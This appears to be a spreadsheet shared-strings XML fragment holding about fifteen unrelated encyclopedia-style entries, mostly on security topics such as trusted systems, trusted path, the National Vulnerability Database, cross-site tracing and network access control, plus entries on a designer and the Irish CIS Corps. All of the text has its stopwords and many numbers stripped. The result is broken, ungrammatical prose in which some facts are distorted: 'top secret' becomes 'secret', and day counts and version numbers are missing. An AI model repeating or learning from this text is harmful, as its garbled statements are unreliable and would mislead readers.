    <t>security engineering subspecialty computer science, trusted system relied upon specified extent enforce specified security policy. this equivalent saying trusted system whose failure would break security policy policy exists system trusted enforce). word "trust" critical, carry meaning might expected everyday usage. trusted system user feels safe use, trusts perform tasks without secretly executing harmful unauthorized programs; trusted computing refers whether programs trust platform unmodified expected, whether programs innocent malicious whether execute tasks undesired user. trusted system also seen level-based security system protection provided handled according different levels. this commonly found military, information categorized unclassified (u), confidential (c), secret (s), secret (ts), beyond. these also enforce policies read-up write-down. trusted systems classified information subset trusted systems ("division "division implement mandatory access control (mac) labels, such, often assumed used processing classified information. however, generally untrue. there four modes operate multilevel secure system: multilevel, compartmented, dedicated, system-high modes. national computer security center's "yellow book" specifies systems used processing strict subset security labels, operated according particularly strict configuration. central concept u.s. department defense-style trusted systems notion "reference monitor", entity occupies logical heart system responsible access control decisions. ideally, reference monitor tamper-proof always invoked small enough subject independent testing, completeness assured.according u.s. national security agency's 1983 trusted computer system evaluation criteria (tcsec), "orange book", "evaluation classes" defined described features assurances user could expect trusted system. dedication significant system engineering toward minimizing complexity (not size, often cited) trusted computing base (tcb) provision highest levels assurance a1). this defined combination hardware, software, firmware responsible enforcing system's security policy. inherent engineering conflict would appear arise higher-assurance systems that, smaller tcb, larger hardware, software, firmware lies outside therefore, untrusted. although lead technically naive sophists' arguments nature trust, argument confuses issue "correctness" "trustworthiness". tcsec precisely defined hierarchy evaluation classes; highest these, featurally identical b3—differing documentation standards. contrast, recently introduced common criteria (cc), derive blend technically mature standards various nato countries, provide tenuous spectrum seven "evaluation classes" intermix features assurances non-hierarchical manner, lack precision mathematical stricture tcsec. particular, tolerate loose identification "target evaluation" (toe) support even encourage inter-mixture security requirements culled variety predefined "protection profiles." while case made even seemingly arbitrary components tcsec contribute "chain evidence" fielded system properly enforces advertised security policy, even highest (e7) level truly provide analogous consistency stricture evidentiary reasoning.the mathematical notions trusted systems protection classified information derive independent interrelated corpora work. 1974, david bell leonard lapadula mitre, technical guidance financial sponsorship maj. roger schell, ph.d., u.s. army electronic systems command (fort hanscom, ma), devised bell-lapadula model, trustworthy computer system modeled terms objects (passive repositories destinations data files, disks, printers) subjects (active entities cause information flow among objects e.g. users, system processes threads operating behalf users). entire operation computer system indeed regarded "history" serializability-theoretic sense) pieces information flowing object object response subjects' requests flows. time, dorothy denning purdue university publishing ph.d. dissertation, dealt "lattice-based information flows" computer systems. mathematical "lattice" partially ordered set, characterizable directed acyclic graph, relationship vertices either "dominates", dominated by," neither.) defined generalized notion "labels" attached entities—corresponding less full security markings encounters classified military documents, e.g. secret wnintel dumbo. bell lapadula integrated denning's concept landmark mitre technical report—entitled, secure computer system: unified exposition multics interpretation. they stated labels attached objects represent sensitivity data contained within object, attached subjects represent trustworthiness user executing subject. (however, subtle semantic difference sensitivity data within object sensitivity object itself.) concepts unified properties, "simple security property" subject read object dominates greater close, albeit mathematically imprecise, interpretation]) "confinement property," "*-property" subject write object dominates it). (these properties loosely referred read-up" write-down," respectively.) jointly enforced, properties ensure information cannot flow "downhill" repository insufficiently trustworthy recipients discover extension, assuming labels assigned subjects truly representative trustworthiness, read-up write-down rules rigidly enforced reference monitor sufficient constrain trojan horses, general classes attacks (sciz., popularly reported worms viruses specializations trojan horse concept). bell-lapadula model technically enforces "confidentiality" "secrecy" controls, i.e. address problem sensitivity objects attendant trustworthiness subjects inappropriately disclose dual problem "integrity" (i.e. problem accuracy, even provenance objects) attendant trustworthiness subjects inappropriately modify destroy addressed mathematically affine models; important named creator, biba. other integrity models include clark-wilson model shockley schell's program integrity model, "the seaview model"an important feature macs, entirely beyond control user. automatically attaches labels subjects executed behalf users files access modify. contrast, additional class controls, termed discretionary access controls(dacs), direct control system users. familiar protection mechanisms permission bits (supported unix since late 1960s flexible powerful form multics since earlier still) access control list (acls) familiar examples dacs. behavior trusted system often characterized terms mathematical model. this rigorous depending upon applicable operational administrative constraints. these take form finite state machine (fsm) state criteria, state transition constraints "operations" correspond state transitions), descriptive top-level specification, dtls (entails user-perceptible interface api, system calls unix system exits mainframes). each element aforementioned engenders model operations. trusted systems trusted computing trusted computing group creates specifications meant address particular requirements trusted systems, including attestation configuration safe storage sensitive information. trusted systems policy analysis context national homeland security, enforcement, social control policy, trusted systems provide conditional prediction behavior people objects prior authorizing access system resources. example, trusted systems include "security envelopes" national security counterterrorism applications, "trusted computing" initiatives technical systems security, credit identity scoring systems financial anti-fraud applications. general, include system probabilistic threat risk analysis used assess "trust" decision-making authorizing access allocating resources likely threats (including design systems constraints control behavior within system); deviation analysis systems surveillance used ensure behavior within systems complies expected authorized parameters.the widespread adoption authorization-based security strategies (where default state default=deny) counterterrorism, anti-fraud, purposes helping accelerate ongoing transformation modern societies notional beccarian model criminal justice based accountability deviant actions occur foucauldian model based authorization, preemption, general social compliance ubiquitous preventative surveillance control system constraints.in emergent model, "security" geared towards policing risk management surveillance, information exchange, auditing, communication, classification. these developments general concerns individual privacy civil liberty, broader philosophical debate appropriate social governance methodologies. trusted systems information theory trusted systems context information theory based following definition: "trust essential communication channel cannot transferred source destination using channel" information theory, information nothing knowledge meaning; simply transferred source destination, using communication channel. transmission, information available destination, transfer zero. information received party party expect—as measured uncertainty party message likewise, trust defined gerck, nothing friendship, acquaintances, employee-employer relationships, loyalty, betrayal overly-variable concepts. trust taken purely subjective sense either, feeling something purely personal psychological—trust understood something potentially communicable. further, definition trust abstract, allowing different instances observers trusted system communicate based common idea trust (otherwise communication would isolated domains), necessarily different subjective intersubjective realizations trust subsystem (man machines) coexist.taken together model information theory, "information expect" "trust know". linking concepts, trust seen "qualified reliance received information". terms trusted systems, assertion trust cannot based record itself, information information channels. deepening questions leads complex conceptions trust, thoroughly studied context business relationships. also leads conceptions information "quality" information integrates trust trustworthiness structure information information system(s) conceived—higher quality terms particular definitions accuracy precision means higher trustworthiness.an example calculus trust connect trusted systems, less trusted taken together?".the federal software group suggested "trust points" provide useful definition trust application information technology environment, related information theory concepts provides basis measuring trust. network-centric enterprise services environment, notion trust considered requisite achieving desired collaborative, service-oriented architecture vision. also accuracy precision computer security data quality information quality trusted computing references external links global information society project joint research project</t>
  </si>
  <si>
    <t>Natural surveillance</t>
  </si>
  <si>
    <t>natural surveillance term used crime prevention through environmental design (cpted) models crime prevention. these models rely ability influence offender decisions preceding criminal acts. research criminal behavior demonstrates decision offend offend influenced cues perceived risk caught cues reward ease entry. consistent research cpted based strategies emphasize enhancing perceived risk detection apprehension. natural surveillance limits opportunity crime taking steps increase perception people seen. natural surveillance occurs designing placement physical features, activities people maximize visibility foster positive social interaction. potential offenders feel increased scrutiny perceive escape routes. natural surveillance typically free cost, however effectiveness deter crime varies individual offender. jane jacobs, north american editor, urban activist, urban planning critic, author death life great american cities (1961), formulated natural surveillance strategy eyes street, called based work york's greenwich village. people moving around area, able observe going around them, provided area open well lit. supporting diversity uses within public space highly effective. other ways promote natural surveillance include landscaping, street lights, street designs encourage pedestrian use, removing hiding lurking places, placing high risk targets, expensive display items, plain view legitimate users, near receptionist sales clerk. included design features maximize visibility people, parking areas building entrances: doors windows look streets parking areas, see-through barriers (glass walls, picket fences), pedestrian-friendly sidewalks streets, front porches. designing nighttime lighting particularly important; uniform high intensity "carpet" lighting large areas discouraged, especially lights glare (and discourage) observers eyes. place feature lighting draws observer's focus access control points potential hiding areas. area lighting still used, shielded cut-off luminaries control glare. light sources typically placed lower ground, higher density, lower intensity lighting designed replace. architectural design increases chance potential offender seen form natural surveillance. often offender might seen matters; offender thinks seen deter crime. also surveillance neighborhood watch physical security security lighting urban vitality references william deutsch, "increased visibility means increased security", about.com "natural surveillance", henrico county, virginia police department</t>
  </si>
  <si>
    <t>Crash Override Network</t>
  </si>
  <si>
    <t>crash override network support group victims large scale online abuse, including revenge porn doxing. history crash override founded game developers quinn alex lifschitz, staffed exclusively victims online abuse whose identities kept anonymous outside group. quinn lifschitz subjected online abuse gamergate harassment campaign, receiving death threats doxxed.crash override formed partnership feminist frequency march 2016, served financial sponsor.from december 2016, crash override's hotline closed. some time 2018, crash override closed fully, "passed torch organisations". mission founders crash override consider conversation starter, repository addressing problems others gaming community "have long hoped would simply away." organisation's services divided three categories: ongoing assistance victims, crisis centre support, community outreach. they provide post-crisis counseling services, help seeking shelter, access experts information security, white hacking, enforcement, public relations threat monitoring. network tailors unique plan action victim works enforcement, media, social media. they promise help victims regardless previous affiliations ideology, including gamergate supporters.the group credited defusing swatting attack advising target preemptively contact police. quinn said launch crash override network renewed heightened campaign abuse, website underwent daily hack attempts. 2015, organisation became official twitter trusted safety resource. references external links official website</t>
  </si>
  <si>
    <t>Trusted path</t>
  </si>
  <si>
    <t>trusted path trusted channel mechanism provides confidence user communicating user intended communicate with, ensuring attackers can't intercept modify whatever information communicated. term initially introduced orange book. security architecture concept, implemented technical safeguards suitable particular environment risk profile. examples electronic signature common criteria european union electronic signature standards trusted path trusted channel describe techniques prevent interception tampering sensitive data passes various system components: trusted path protects data user security component (e.g. sent smart card unblock digital signature), trusted channel protects data security component information resources (e.g. data read file sent smart card signature). user login popular techniques password stealing microsoft windows login spoofing, based programs simulated operating system's login prompt. when users fake login program capture user passwords later use. safeguard windows introduced ctrl-alt-del sequence secure attention escape third party programs invoke system login prompt.a similar problem arises case websites requiring authentication, user expected enter credentials without actually knowing website spoofed. https mitigates attack first authenticating server user (using trust anchor certification path validation algorithm), displaying login form. references</t>
  </si>
  <si>
    <t>Crawford Dunn</t>
  </si>
  <si>
    <t>crawford boddie dunn (october 1918 september 1980) designer specializing graphics corporate communication. dunn known modern design aesthetic holistic approach graphic identity communication, applied variety clients southwest. 1975 newspaper article, dunn said range work, "this spectrum comprises design print graphics, architectural graphics well corporate identity." company brochure identifies another aspect work, "environmental signing design." early life work history dunn born bogalusa, louisiana, attended haverford college university alabama graduating bachelor's degree industrial design institute chicago. dunn arrived dallas 1951 first worked vought corporation. years later opened design firm, crawford dunn, inc. newspaper article 1963 identifies firm ikonogenics, inc., later article announced affiliation group form crawford dunn incorporated. upon death 1980 firm known r.y.a. graphics. communication philosophy dunn's central philosophy visual communication expressed 1971 article "alphasignal, parasignal, infrasignal: notes toward theory communication." article defines three interrelated levels communication signals ranging containing pure information (alphsignal) colored distorted uncontrollable factors (infrasignal). another concept developed dunn, ikonogenic, refers removal peripheral secondary "noise" lessens impact message. range clients dunn worked plethora organizations various design projects, including world trade center dallas (signage), texas stadium, zale corporation, north texas state university, university texas arlington, marsalis zoo, southland corp., richland college, nasa, miller companies, datum structures, lamm frates co., envirodynamics, willhide interiors, amarillo national bank, bank commerce tulsa, city mesquite, faxon, inc., first national bank abilene, fort worth chamber commerce, amon carter museum western art, parkland memorial hospital, dalpark, dallas convention center, university texas southwestern medical school, dallas morning news, wbap radio.one dunn's signature projects involved comprehensive redeployment wbap-tv's identity remaking communication channels, including "visuals, graphics, sets, letterheads, logos, station advertising, program titles, music."another prominent commission dunn completed logo city dallas, described "simple, uncluttered, modern." logo began appear police cars 1973 effort facilitate better communication citizens police. dunn said, feel police reflect attributes good policeman, approachable instead threatening, authoritative instead imperious." 2012, dallas observer published article recognizing 40th anniversary logo.dunn also worked number museums publication design projects, including first comprehensive catalog held amon carter museum western art. references</t>
  </si>
  <si>
    <t>Creative Commons Rights Expression Language</t>
  </si>
  <si>
    <t>creative commons rights expression language (ccrel) proposed rights expression language (rel) descriptive metadata appended media licensed creative commons licenses. according draft submitted w3c, come forms rdfa (x)html pages standalone media. external links creative commons "describing copyright rdf". creative commons. "ccrel schema" (rdf schema). creative commons. "ccrel (project homepage)". creative commons. "ccrel: creative commons rights expression language" (pdf). creative commons. march 2008. submission ccrel: creative commons rights expression language member submission 2008 "fsf introduces licenses". creative commons. june 2009. "gnu ccrel" (ccrel). free software foundation.</t>
  </si>
  <si>
    <t>National Vulnerability Database</t>
  </si>
  <si>
    <t>national vulnerability database (nvd) u.s. government repository standards-based vulnerability management data represented using security content automation protocol (scap). this data enables automation vulnerability management, security measurement, compliance. includes databases security checklists, security related software flaws, misconfigurations, product names, impact metrics. supports information security automation program (isap). friday march 2013, database taken offline discovered system used multiple government sites compromised software vulnerability adobe coldfusion.in june 2017, threat intel firm recorded future revealed median cve2 revealed ultimately published days vulnerabilities published unofficially making nvd, giving attackers time exploit vulnerability.in addition providing list common vulnerabilities exposures (cves), scores vulnerabilities using common vulnerability scoring system (cvss) based equations using metrics access complexity availability remedy. also common weakness enumeration common vulnerabilities exposures references external links official website security content automation protocol (scap) packet storm exploit database security content database</t>
  </si>
  <si>
    <t>Credential Management</t>
  </si>
  <si>
    <t>credential management, also referred credential management system (cms), established form software used issuing managing credentials part public infrastructure (pki). software used governments enterprises issuing strong two-factor authentication (2fa) employees citizens. integrates components provide joined-up solution departments issue manage credentials wide selection devices, including smart cards, keys, smartphones, laptops desktop computers.credential management also proposed application programming interface (api) development world wide consortium standardizing aspects password managers used user agents (web browsers applications) create, store, use, modify username password combinations logins, addition management "federated" credentials (such single sign-on tokens) user agents. developed w3c's application security working group, working draft status since april 2016. recommendation-track proposal, expected become accepted standard, undergo significant changes occurs. credential management already extended webauthn (web authentication) proposal, reached candidate recommendation status april 2018 adds ability handle public-key authentication.it common modern browsers able store automatically enter usernames passwords website logins, though often used suboptimal heuristics guessing form fields data supposed filled/stored, resulting inconsistent sometimes faulty behavior. browsers also trouble filling login forms federated identities, user connecting website uses account third-party service (like facebook, google, twitter) authenticate provide identity information. credential management specification also aims streamline process changing passwords locally stored password client updated time modified server. google chrome included support credential management since version released 2016, opera included support since version released april 2017. mozilla firefox includes subset support webauthn since version released 2018. august 2017 working draft, user agents supporting credential management must implement "credential store" persistent storage credential objects, also include "credential chooser" allow users interact objects allow deny logins. credentials ideally name favicon associated them, perhaps along related information, help distinguish website service used for, well ability differentiate credentials multiple accounts site. defines four main javascript methods, expose credentialscontainer interface: navigator.credentials.create(), navigator.credentials.store(), navigator.credentials.get(), navigator.credentials.preventsilentaccess(). also specifies top-level credential interface object, descendant passwordcredential federatedcredential object types. (webauthn also defines publickeycredential interface object.) available user agent connected secure (https) website. browsers still implement auto-filling login information non-secure sites, must allow sites benefit automation provides, since could lead accidental exposure passwords credentials. addition, access allowed top-level windows, within &lt;iframe&gt; elements nested browsing contexts. navigator.credentials.create() method used constructing credential objects memory, store() triggers writing object credential store following successful login. get() requests potentially relevant credentials storage, presented user credential chooser. when retrieval requests made, user agents required prompt user authorization default, though user interface allow flag allows "silent" authorization without presenting prompt. website reset flag preventsilentaccess() method, recommended logging out. also openid connect references external links credential management level application security working group</t>
  </si>
  <si>
    <t>National Strategy to Secure Cyberspace</t>
  </si>
  <si>
    <t>united states government, national strategy secure cyberspace, component larger national strategy homeland security. national strategy secure cyberspace drafted department homeland security reaction september 2001 terrorist attacks. released february 2003, offers suggestions, mandates, business, academic, individual users cyberspace secure computer systems networks. prepared year research businesses, universities, government, five months public comment. plan advises number security practices well promotion cyber security education. national strategy secure cyberspace identifies three strategic objectives: prevent cyber attacks america's critical infrastructures; reduce national vulnerability cyber attacks; minimize damage recovery time cyber attacks occur. meet objectives, national strategy outlines five national priorities: first priority, creation national cyberspace security response system, focuses improving government's response cyberspace security incidents reducing potential damage events. second, third, fourth priorities (the development national cyberspace security threat vulnerability reduction program, creation national cyberspace security awareness training program, necessity securing governments' cyberspace) reduce threats from, vulnerabilities cyber attacks. fifth priority, establishment system national security international cyberspace security cooperation, intends prevent cyber attacks could impact national security assets improve international management response attacks. ultimately, national strategy encourages companies regularly review technology security plans, individuals internet firewalls anti-virus software systems. calls single federal center help detect, monitor analyze attacks, expanded cyber security research improved government-industry cooperation. strategies formulated cybersecurity discourse responsive multi-pronged. former focuses flexible plans actions developed adapted response changes dynamics existing socio-technical systems. latter focuses strategies developed thoughtfully considering interconnected elements, methods, actors systems several points view directions. also cyber-security regulation national security directive notes external links national strategy secure cyberspace statement press secretary conclusion cyberspace review, white house, press office, april 2009 nato cooperative cyber defence centre excellence</t>
  </si>
  <si>
    <t>Credential service provider</t>
  </si>
  <si>
    <t>credential service provider (csp) trusted entity issues security tokens electronic credentials subscribers. forms part authentication system, typically identified separate entity federated authentication system. independent third party, issue credentials use. term used frequently context government's egov e-authentication initiatives. example would online site whose primary purpose example, internet banking whose users subsequently authenticated sites, applications services without action part. history authentication system, entity required authenticate user behalf target application service. many years poor understanding impact security multiplicity services applications would ultimately require authentication. result users burdened many credentials must remember carry around them, also applications services must perform level registration level authentication users. result, credential service providers created. separates functions application service typically provides trust application service network (such internet). process establishes mechanism uniquely identify subscriber associated tokens credentials issued subscriber. registers gives subscriber token used authentication protocol issues credentials needed bind token identity, bind identity useful verified attribute. subscriber given electronic credentials token time registration, credentials generated later needed. subscribers duty maintain control tokens comply responsibilities csp. maintains registration records subscriber allow recovery registration records.in e-authentication model, claimant authentication protocol subscriber csp. point, applicant registers registration authority (ra), verifies identity applicant, typically presentation paper credentials records databases. this process called identity proofing. turn, vouches identity applicant (and possibly verified attributes) csp. applicant becomes subscriber csp. establishes mechanism uniquely identify subscriber associated tokens credentials issued subscriber. there always relationship csp. importance csps establishes confidence user identity electronic authentication process. result, regulatory agencies individuals proof identities csp. today, regulatory agencies require physicians authenticated electronically physicians issue prescription controlled dangerous substances (cds). physicians seek federally approved csps order receive two-factor authentication credential digital certificates. cpss conduct identity proofing meets national institute standards technology special publication 800-63-1 assurance level government federal government currently e-government transactions. however, government plans focus attention applications leave credential management business industries.in 2004, government proposed e-authentication initiative. goals initiative include: build enable mutual trust needed support widespread electronic interactions public government. minimize burden public obtaining trusted electronic services government. deliver common interoperable authentication solutions, appropriately matching levels risk business risks.as result initiative, campuses start offering student, faculty staff access certain federal applications. however, happens, government impose following requirements: fedfed membership requirements levels credential assessment signing business operating rules technical interoperability saml fedfed membership requirements levels cross-certification federal service provider requirements join federal federation directly those services provides wishing join federal federation directly agree with: eauthentication business operating rules risk analysis service levels security levels″ compliance fips nist reporting requirements procedural, audit documentation requirements. providers below short list csps short description services provide. equifax equifax provides credentialing solutions certified meet federal security privacy requirements. equifax offers beyond basic name address identification credential. equifax provides methods discerning electronic identity order ensure trusted users access sensitive data secure networks. mediquin mediquin credential service provider located irvine, california. mediquin provides medical credentialing, provider applications, enrollment forms, verification services, medical related credential services. advantage advantage provide numerous verification services. board certification verify current certificate level criminal background verify state and/or federal criminal history dea/cds registration verify ntis and/or certificate education verify medical education post graduate education fsmb query federation state medical boards license- verify state license(s) malpractice claims verify carrier malpractice insurance verify carrier certificate npdb query national practitioner databank hipdb query healthcare integrity protection databank privileges verify hospital admitting privileges delineation privileges references verify professional references sanctions query medicare/medicaid state license work history extract work history curriculum vitae costs below table shows approximate cost credential service provider different categories. kantara initiative initiative identity assurance accreditation approval program kantara program tries order provide private sectors better reliable digital credentials. windows windows uses implement authentication protocols. with windows vista, authentication package called credential security service provider (credssp) introduced. credssp uses client-side enable applications delegate user's credentials target server. references</t>
  </si>
  <si>
    <t>Confederation of European Data Protection Organisations</t>
  </si>
  <si>
    <t>confederation european data protection organisations (cedpo) european umbrella organisation data protection organisations. data protection umbrella organisation cedpo founded september 2011 national data protection organisations european umbrella organisation, (2014) without explicit legal form. cedpo pursues promote role data protection officer provide advice balanced, practicable, effective data protection. addition, cedpo aims contribute better harmonisation data protection practices european union (eu) european economic area (eea). founder members four founder members cedpo association française correspondants protection données caractère personnel (afcdp, france), asociación profesional española privacidad (apep, spain), gesellschaft datenschutz datensicherheit e.v. (gdd, germany) nederlands genootschap functionarissen voor gegevensbescherming (ngfg, netherlands). members present legal entities cedpo include: association data protection officers (adpo), ireland, http://www.dpo.ie/ association française correspondants protection données caractère personnel (afcdp), france, http://www.afcdp.net/ asociación profesional española privacidad (apep), spanien, http://www.apep.es/ arge daten, austria, http://www.argedaten.at/ association data protection officer (asso dpo), italy, https://www.assodpo.it/ gesellschaft datenschutz datensicherheit (gdd) e.v., germany, https://www.gdd.de/ nederlands genootschap functionarissen voor gegevensbescherming (ngfg), netherlands, http://www.ngfg.nl/ stowarzyszenie administratorów bezpieczeństwa informacji (sabi), poland, http://www.sabi.org.pl/ associação encarregados proteção dados (aepd), portugal, https://www.aepd.pt/ asociația specialiștilor confidențialitate protecția datelor (ascpd), romania, https://ascpd.ro/ references external links official website</t>
  </si>
  <si>
    <t>Cross-site tracing</t>
  </si>
  <si>
    <t>security, cross-site tracing (abbreviated "xst") network security vulnerability exploiting http trace method. scripts exploit activex, flash, controls allow executing http trace request. http trace response includes http headers including authentication data http cookie contents, available script. combination cross domain access flaws browsers, exploit able collect cached credentials site, including utilizing ssl. external links cross-site tracing perl. vulnerability note vu#867593 multiple vendors' servers enable http trace method default whitehat security whitepaper cross-site tracing (xst)</t>
  </si>
  <si>
    <t>Network Access Control</t>
  </si>
  <si>
    <t>network access control (nac) approach computer security attempts unify endpoint security technology (such antivirus, host intrusion prevention, vulnerability assessment), user system authentication network security enforcement. description network access control computer networking solution uses protocols define implement policy describes secure access network nodes devices initially attempt access network. might integrate automatic remediation process (fixing non-compliant nodes allowing access) network systems, allowing network infrastructure routers, switches firewalls work together back office servers user computing equipment ensure information system operating securely interoperability allowed. basic form 802.1x standard. network access control aims exactly name implies—control access network policies, including pre-admission endpoint security policy checks post-admission controls users devices network example when computer connects computer network, permitted access anything unless complies business defined policy; including anti-virus protection level, system update level configuration. while computer checked pre-installed software agent, access resources remediate (resolve update) issues. once policy met, computer able access network resources internet, within policies defined system. mainly used endpoint health checks, often tied role-based access. access network given according profile person results posture/health check. example, enterprise department could access department files role endpoint meets anti-virus minimums. goals because represents emerging category security products definition evolving controversial. overarching goals concept distilled mitigation zero-day attacks authorization, authentication accounting network connections. encryption traffic wireless wired network using protocols 802.1x eap-tls, eap-peap eap-mschap. role-based controls user, device, application security posture post authentication. automation tools define network role based information known vulnerabilities, jailbreak status etc. main benefit solutions prevent end-stations lack antivirus, patches, host intrusion prevention software accessing network placing computers risk cross-contamination computer worms. policy enforcement solutions allow network operators define policies, types computers roles users allowed access areas network, enforce switches, routers, network middleboxes. identity access management where conventional networks enforce access policies terms addresses, environments attempt based authenticated user identities, least user end-stations laptops desktop computers. concepts pre-admission post-admission there prevailing designs nac, based whether policies enforced end-stations gain access network. former case, called pre-admission nac, end-stations inspected prior allowed network. typical case pre-admission would prevent clients out-of-date antivirus signatures talking sensitive servers. alternatively, post-admission makes enforcement decisions based user actions, users provided access network agent versus agentless fundamental idea behind allow network make access control decisions based intelligence end-systems, manner network informed end-systems design decision. difference among systems whether require agent software report end-system characteristics, whether scanning network inventory techniques discern characteristics remotely. matured, software developers microsoft adopted approach, providing network access protection (nap) agent part windows vista releases. there also compatible agents linux provide equal intelligence operating systems. out-of-band versus inline out-of-band systems, agents distributed end-stations report information central console, turn control switches enforce policy. contrast inline solutions single-box solutions internal firewalls access-layer networks enforce policy. out-of-band solutions advantage reusing existing infrastructure; inline products easier deploy networks, provide advanced network enforcement capabilities, directly control individual packets wire. however, products agentless, inherent advantages easier, less risky out-of-band deployment, techniques provide inline effectiveness non-compliant devices, enforcement required. remediation, quarantine captive portals network operators deploy products expectation legitimate clients denied access network users never out-of-date patch levels, would unnecessary). because this, solutions require mechanism remediate end-user problems deny access. common strategies remediation quarantine networks captive portals: quarantine quarantine network restricted network provides users routed access certain hosts applications. quarantine often implemented terms vlan assignment; product determines end-user out-of-date, switch port assigned vlan routed patch update servers, rest network. other solutions address management techniques (such address resolution protocol (arp) neighbor discovery protocol (ndp)) quarantine, avoiding overhead managing quarantine vlans. captive portals captive portal intercepts http access pages, redirecting users application provides instructions tools updating computer. until computer passes automated inspection, network usage besides captive portal allowed. this similar paid wireless access works public access points.external captive portals allow organizations offload wireless controllers switches hosting portals. single external portal hosted appliance wireless wired authentication eliminates need create multiple portals, consolidates policy management processes. mobile using mobile deployment, workers connect various wireless networks throughout workday, involves challenges present wired environment. when user denied access security concern, productive device lost, impact ability complete serve customer. addition, automated remediation takes seconds wired connection take minutes slower wireless data connection, bogging device. mobile solution gives system administrators greater control whether, remediate security concern. lower-grade concern out-of-date antivirus signatures result simple warning user, serious issues result quarantining device. policies automated remediation, pushing applying security patches updates, withheld device connected wi-fi faster connection, working hours. this allows administrators appropriately balance need security goal keeping workers productive. also network access protection network admission control trusted network connect references external links nac: what went wrong? booz allen hamilton leaves unsecured files server</t>
  </si>
  <si>
    <t>Network Admission Control</t>
  </si>
  <si>
    <t>network admission control (nac) refers cisco's version network access control, restricts access network based identity security posture. when network device (switch, router, wireless access point, dhcp server, etc.) configured nac, force user machine authentication prior granting access network. addition, guest access granted quarantine area remediation problems caused authentication failure. this enforced inline custom network device, changes existing switch router, restricted dhcp class. typical (non-free) wifi connection form nac. user must present sort credentials credit card) granted access network. initial phase, cisco network admission control (nac) functionality enables cisco routers enforce access privileges endpoint attempts connect network. this access decision basis information endpoint device, current antivirus state. antivirus state includes information version antivirus software, virus definitions, version scan engine. network admission control systems allow noncompliant devices denied access, placed quarantined area, given restricted access computing resources, thus keeping insecure nodes infecting network. component cisco network admission control program cisco trust agent, resides endpoint system communicates cisco routers network. cisco trust agent collects security state information, antivirus software used, communicates information cisco routers. information relayed cisco secure access control server (acs) access control decisions made. directs cisco router perform enforcement endpoint. this cisco product marked life since november 2011, cisco's terminology product longer developed supported. posture assessment besides user authentication, authorization based upon compliance checking. this posture assessment evaluation system security based applications settings particular system using. these might include windows registry settings presence security agents anti-virus personal firewall. products differ checking mechanisms: 802.1x extensibile authentication protocol microsoft windows domain authentication login credentials cisco appliance switch authentication pre-installed security agent web-based security agent network packet signatures anomalies external network vulnerability scanner external database known systems agent-less posture assessment most vendors require 802.1x supplicant (client agent) installed. some, including hexis' netbeat nac, trustwave, enterasys offer agent-less posture checking. this designed handle "bring your device" "byod" scenario detect fingerprint network attached devices, whether wired wireless determine devices common vulnerabilities exposures (aka "cves") quarantine rogue devices well infected malwarethe agent-less approach works heterogeneously across almost network environments network device types. also access control network access protection cisco appliance network access control packetfence references external links network admission control cisco systems agent-less network admission control netclarity, inc. fastnac next-generation</t>
  </si>
  <si>
    <t>Communications &amp; Information Services Corps</t>
  </si>
  <si>
    <t>communications information services corps (cis) (irish: seirbhísí cumarsáide agus eolais) formerly army corps signals combat support corps irish defence forces, military ireland. responsible installation, maintenance operation communications information systems command, control administration defence forces, facilitation accurate, real-time sharing intelligence army, naval service corps branches home overseas.the corps headquartered mckee barracks, dublin, comes command officer colonel rank, known director corps. mission formerly army corps signals, communications information services corps responsible development operation information technology telecommunications systems support defence forces tasks. also responsible coordinating communications radio line information systems, communications research updating communications line modern developments operational requirements. corps tasked utilising networking information technologies order dramatically increase defence force operational effectiveness provision timely accurate information appropriate commander, along real time efficient sharing information intelligence army, naval service corps, well multinational partners involved international peacekeeping actors required.this role includes development maintenance secure nationwide defence forces telecommunications network (dftn), support protected voice data services, provision maintenance encrypted military communications equipment defence forces personnel home abroad. corps units dispersed throughout giving communications support army brigades; naval service, corps, defence forces training centre (dftc) defence forces headquarters (dfhq). corps base workshops detailed maintenance, research development conducted.the corps collar flash features angel gabriel, messenger god, behind signal shield caption "cór comharthaíochta". this irish translation 'signals corps', translation communications information services corps seirbhísí cumarsáide agus eolais". signals intelligence cyber communications information services (cis) corps works defence forces intelligence branch, directorate military intelligence (j2), regards signals intelligence (sigint), houses dedicated sigint element within corps. corps ability intercept monitor communications, remotely collect data, process under irish legislation, criminal justice (surveillance) 2009 interception postal packets telecommunications messages (regulation) 1993 provides defence forces legal authority conduct domestic intelligence operations involving espionage, electronic communications stored electronic information order safeguard maintain security state.the corps along garda síochána, national police force, provide significant domestic support role national cyber security centre (ncsc) department communications, climate action environment countering cyber-attacks, protecting critical national infrastructure securing government communications. responsible cyber security within defence forces, maintains capability area purpose protecting networks users domestic foreign. 2016 establishment computer incident response team (cirt) dfhq company revealed.in july 2015, leaked email correspondence hacking team private italian spying eavesdropping software company reportedly showed members irish corps discussions company purchase intrusion surveillance "solutions" lawful interception online communications, monitoring incoming outgoing emails, browsing activity, skype calls, remotely switching webcams microphones remotely taking control devices. defence forces spokesperson said operational security reasons could comment specific elements activities corps, confirmed goods services purchased company question.the corps deployed 'ethical hackers' fight back health service executive ransomware attack mid-2021, sent personnel hospitals offices order decrypt devices affected cyberattack onsite. reservists particularly useful effort cybersecurity skills experienced gleaned private sector. school soldiers join communications information services corps following apprenticeship trades; communication operative electronic engineering technician software engineering technician information technology support technician communications information services technician regimental signaller radio instructor telephone maintenance technician data communications technician microwave systems technician network administratorall personnel basic military training. school runs large number related courses, including degree programme military communications technicians association institute technology, carlow.there sections school, providing training areas operational procedures, technical proficiency simulation. procedural operations section (proc/ops); communications operative course detachment commanders course aerial riggers course regimental signals course standard course young officers coursetechnical section; trainee technician scheme (tts) technical training advancement courses strategic applications trainingsimulation section; digital indoor range theatres (dirt) command staff trainerthe dirt range digital indoor shooting range trainees assessed marksmanship skills various small arms weapons used helps develop proficiencies methodically without firing live ammunition regular basis. million facility based department defence properties kilworth camp, county cork. communications information services corps units active units defence forces headquarters company (dfhq coy), mckee barracks, dublin communications division, naval service (comms div, ns), halbouline, cork corps squadron, casement aerodrome, baldonnel, dublin group (including school, base signal workshops, base technical stores) curragh camp, kildare field company coy), collins barracks, cork field company coy), cathal brugha barracks, dublin retired units field company coy), custume barracks, athlone reserve field company coy), sarsfield barracks, limerick collins barracks, cork reserve field company coy), custume barracks, athlone military post, sligo reserve field company coy), cathal brugha barracks, dublinthe reserve defence forces (rdf) units integrated permanent defence forces (pdf) units part "single force concept". also signals intelligence alliances, nations industries national cyber security centre (ncsc) directorate military intelligence (j2) army ranger wing (arw) garda crime security branch (csb) garda national surveillance unit (nsu) centre cybersecurity cybercrime investigation (ucd cci) royal corps signals references external links defence forces ireland army corps communications information services corps defence forces ireland corps communication information services squadron</t>
  </si>
  <si>
